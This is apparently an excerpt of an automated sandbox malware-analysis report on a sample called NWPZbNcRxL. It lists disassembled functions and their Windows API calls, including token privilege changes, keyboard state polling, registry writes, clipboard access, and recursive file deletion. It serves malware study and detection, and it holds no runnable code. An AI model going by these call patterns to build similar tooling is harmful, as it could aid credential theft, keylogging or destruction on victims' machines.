                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                            • API String ID: 4125248594-2988720461
                                                                                                                            • Opcode ID: c16a342a7b6b241b31122df26f5b6ad9fd6459f6e48e7b380290a3b21b45fc08
                                                                                                                            • Instruction ID: 637dd5f2b0f1fb5717d33f81949e4e4367dd7ee13056f5f412911b798871c5c9
                                                                                                                            • Opcode Fuzzy Hash: c16a342a7b6b241b31122df26f5b6ad9fd6459f6e48e7b380290a3b21b45fc08
                                                                                                                            • Instruction Fuzzy Hash: 1A314571A40318BBEB216F619C49F7F7F6CEB44B50F11402AFA05EA1D1C6B05D51AAA1
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C6882B
                                                                                                                              • Part of subcall function 00C687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C68858
                                                                                                                              • Part of subcall function 00C687E1: GetLastError.KERNEL32 ref: 00C68865
                                                                                                                            • _memset.LIBCMT ref: 00C68353
                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C683A5
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C683B6
                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C683CD
                                                                                                                            • GetProcessWindowStation.USER32 ref: 00C683E6
                                                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 00C683F0
                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C6840A
                                                                                                                              • Part of subcall function 00C681CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C68309), ref: 00C681E0
                                                                                                                              • Part of subcall function 00C681CB: CloseHandle.KERNEL32(?,?,00C68309), ref: 00C681F2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                            • String ID: $default$winsta0
                                                                                                                            • API String ID: 2063423040-1027155976
                                                                                                                            • Opcode ID: 529a597c3eded5adc2d3c297440e300312aab7e94d5232ebf46b7ac3eb070832
                                                                                                                            • Instruction ID: a78d187e49eb4bc22b7acc0cb93f85ca13b1ba189baea2d834f832702a81105d
                                                                                                                            • Opcode Fuzzy Hash: 529a597c3eded5adc2d3c297440e300312aab7e94d5232ebf46b7ac3eb070832
                                                                                                                            • Instruction Fuzzy Hash: AB814071900209AFDF21DFA4DC89BEE7B79FF04304F14426AF925A6161DB318E19EB20
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C7C78D
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7C7E1
                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C7C806
                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C7C81D
                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C7C844
                                                                                                                            • __swprintf.LIBCMT ref: 00C7C890
                                                                                                                            • __swprintf.LIBCMT ref: 00C7C8D3
                                                                                                                              • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                                                                            • __swprintf.LIBCMT ref: 00C7C927
                                                                                                                              • Part of subcall function 00C33698: __woutput_l.LIBCMT ref: 00C336F1
                                                                                                                            • __swprintf.LIBCMT ref: 00C7C975
                                                                                                                              • Part of subcall function 00C33698: __flsbuf.LIBCMT ref: 00C33713
                                                                                                                              • Part of subcall function 00C33698: __flsbuf.LIBCMT ref: 00C3372B
                                                                                                                            • __swprintf.LIBCMT ref: 00C7C9C4
                                                                                                                            • __swprintf.LIBCMT ref: 00C7CA13
                                                                                                                            • __swprintf.LIBCMT ref: 00C7CA62
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                            • API String ID: 3953360268-2428617273
                                                                                                                            • Opcode ID: 579b79f4c0e62b59066fa65bbb633324643fcae6a89bba1daf571d02a17ae62e
                                                                                                                            • Instruction ID: 12b66028afbc954a169018646fb708e696d260a35c2c9fad8e0f359d6224f6f7
                                                                                                                            • Opcode Fuzzy Hash: 579b79f4c0e62b59066fa65bbb633324643fcae6a89bba1daf571d02a17ae62e
                                                                                                                            • Instruction Fuzzy Hash: FCA14BB1408245ABC700EFA4C896EEFB7ECFF85700F40492DF595C6191EA30DA49EB62
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C7EFB6
                                                                                                                            • _wcscmp.LIBCMT ref: 00C7EFCB
                                                                                                                            • _wcscmp.LIBCMT ref: 00C7EFE2
                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C7EFF4
                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00C7F00E
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00C7F026
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7F031
                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00C7F04D
                                                                                                                            • _wcscmp.LIBCMT ref: 00C7F074
                                                                                                                            • _wcscmp.LIBCMT ref: 00C7F08B
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7F09D
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00CC8920), ref: 00C7F0BB
                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7F0C5
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7F0D2
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7F0E4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 1803514871-438819550
                                                                                                                            • Opcode ID: 7d9f6de67ab8beab25995f8f61f8e82d295c949b1d9f89cefbeb05ab3a10baf3
                                                                                                                            • Instruction ID: b0d100b15f463f1c4a3f769531ec4ad66dc48bce33299448fb6d78026675da53
                                                                                                                            • Opcode Fuzzy Hash: 7d9f6de67ab8beab25995f8f61f8e82d295c949b1d9f89cefbeb05ab3a10baf3
                                                                                                                            • Instruction Fuzzy Hash: 0031C3325012186BDB14AFB4DC8DFEE77ACAF48360F14817AE818D21A1DB70DB46DA61
                                                                                                                            APIs
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C90953
                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C9F910,00000000,?,00000000,?,?), ref: 00C909C1
                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C90A09
                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C90A92
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C90DB2
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C90DBF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$ConnectCreateRegistryValue
                                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                            • API String ID: 536824911-966354055
                                                                                                                            • Opcode ID: efd83b0ab5a2789779a838fa46cba6945c93f5824454b0b6278afbdc97b99285
                                                                                                                            • Instruction ID: eebcd1f39f1770776b18693cd4d6bdfa3c63c1eb7e7b24e3a51a839aecf6bb34
                                                                                                                            • Opcode Fuzzy Hash: efd83b0ab5a2789779a838fa46cba6945c93f5824454b0b6278afbdc97b99285
                                                                                                                            • Instruction Fuzzy Hash: CF029E756006019FDB14EF14C895E6AB7E5FF8A710F14855CF89A9B3A2CB30EE41EB81
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C7F113
                                                                                                                            • _wcscmp.LIBCMT ref: 00C7F128
                                                                                                                            • _wcscmp.LIBCMT ref: 00C7F13F
                                                                                                                              • Part of subcall function 00C74385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C743A0
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00C7F16E
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7F179
                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00C7F195
                                                                                                                            • _wcscmp.LIBCMT ref: 00C7F1BC
                                                                                                                            • _wcscmp.LIBCMT ref: 00C7F1D3
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7F1E5
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00CC8920), ref: 00C7F203
                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7F20D
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7F21A
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7F22C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 1824444939-438819550
                                                                                                                            • Opcode ID: 297a8a220c3fc8c1bcaafd29c092daa25ceef9e8d543e22874a937f8d7f85b57
                                                                                                                            • Instruction ID: a0fa86ef0fc6ea36a102ea368267b82decd04400b448fd972288f02da7bab3c4
                                                                                                                            • Opcode Fuzzy Hash: 297a8a220c3fc8c1bcaafd29c092daa25ceef9e8d543e22874a937f8d7f85b57
                                                                                                                            • Instruction Fuzzy Hash: 0D31C536500219ABDB14AFB4EC89FEE77AC9F45360F14817AE818E20A1DB30DF46DA54
                                                                                                                            APIs
                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C7A20F
                                                                                                                            • __swprintf.LIBCMT ref: 00C7A231
                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C7A26E
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C7A293
                                                                                                                            • _memset.LIBCMT ref: 00C7A2B2
                                                                                                                            • _wcsncpy.LIBCMT ref: 00C7A2EE
                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C7A323
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C7A32E
                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00C7A337
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C7A341
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                            • API String ID: 2733774712-3457252023
                                                                                                                            • Opcode ID: b100c8700425414d25a74d9f505520a46680f00fcd4d481737dc30629c4c5368
                                                                                                                            • Instruction ID: 0d268509504b66f407b013a59d2c2a73bc1fce52d43193fcb1052af953302de2
                                                                                                                            • Opcode Fuzzy Hash: b100c8700425414d25a74d9f505520a46680f00fcd4d481737dc30629c4c5368
                                                                                                                            • Instruction Fuzzy Hash: 62319EB1904109ABDB219FA0DC49FEF77BCEF88740F1041BAF919D2161EB7497458B25
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$w02d0we2d0wb2d0w72d0w02d0w82d0wd2d0w42d0w52d0wd2d0w82d0w52d0w02d0w82d0wd2d0w82d0wd2d0w32d0w02d0wf2d0we2d0wf2d0wf2d0wf2d0wf2d0w52d0
                                                                                                                            • API String ID: 0-3496363466
                                                                                                                            • Opcode ID: 2c0bf8b1a6f388dd16fb709e70b49056bf5444da8c24333efd57fc45b81a44f1
                                                                                                                            • Instruction ID: 2b8769ccf6cd5dc1a5c81dc2d2f2f37c5c4b0d775384f8cf0e68cbc1b8f50bc1
                                                                                                                            • Opcode Fuzzy Hash: 2c0bf8b1a6f388dd16fb709e70b49056bf5444da8c24333efd57fc45b81a44f1
                                                                                                                            • Instruction Fuzzy Hash: 0D729375E00229CBDF24CF59D8807AEB7B5FF44310F18816AE816EB690DB309E81DB90
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C70097
                                                                                                                            • SetKeyboardState.USER32(?), ref: 00C70102
                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00C70122
                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00C70139
                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00C70168
                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00C70179
                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00C701A5
                                                                                                                            • GetKeyState.USER32(00000011), ref: 00C701B3
                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00C701DC
                                                                                                                            • GetKeyState.USER32(00000012), ref: 00C701EA
                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00C70213
                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00C70221
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 541375521-0
                                                                                                                            • Opcode ID: 1b35fb8971482fd8a7603812848adb11f77eef5c330ea3fb402bacfdb2aef2ca
                                                                                                                            • Instruction ID: 9c33aa253cf5de62d2a507ccad2706161718b8885957b115b4978452b1f624bb
                                                                                                                            • Opcode Fuzzy Hash: 1b35fb8971482fd8a7603812848adb11f77eef5c330ea3fb402bacfdb2aef2ca
                                                                                                                            • Instruction Fuzzy Hash: FD511C30904388A9FB35DBB088557EEBFB49F01380F58C59ED9DA561C3DAA49B8CC761
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C904AC
                                                                                                                              • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                                                                              • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C9054B
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C905E3
                                                                                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C90822
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C9082F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1240663315-0
                                                                                                                            • Opcode ID: c9f63baae895f2569d3c5f48b03f41aef6f30915894c30a43cbeb8d7a82435e5
                                                                                                                            • Instruction ID: d62c31c59639c07070e798e71a2cd469b87051a57050ad25fcff7533c89343d6
                                                                                                                            • Opcode Fuzzy Hash: c9f63baae895f2569d3c5f48b03f41aef6f30915894c30a43cbeb8d7a82435e5
                                                                                                                            • Instruction Fuzzy Hash: D0E15E31204214AFCB14DF24C895E6ABBF8EF89314F14856DF85ADB2A2DB30ED41DB91
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1737998785-0
                                                                                                                            • Opcode ID: 407ab508c16f9f10058aaed65f506d0bcd8af4ae9f0a037fbdb1ed65d2309a05
                                                                                                                            • Instruction ID: ef64fc2ee9a83592f7400b3c45776aa1c88eec94a25a0ffa927fe72b205f8741
                                                                                                                            • Opcode Fuzzy Hash: 407ab508c16f9f10058aaed65f506d0bcd8af4ae9f0a037fbdb1ed65d2309a05
                                                                                                                            • Instruction Fuzzy Hash: 8021C1352006119FEB14AF24EC5DBAE7BA8FF05715F10802AF946DB2B1DB30AD42DB58
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770
                                                                                                                              • Part of subcall function 00C74A31: GetFileAttributesW.KERNEL32(?,00C7370B), ref: 00C74A32
                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C738A3
                                                                                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C7394B
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00C7395E
                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C7397B
                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7399D
                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C739B9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
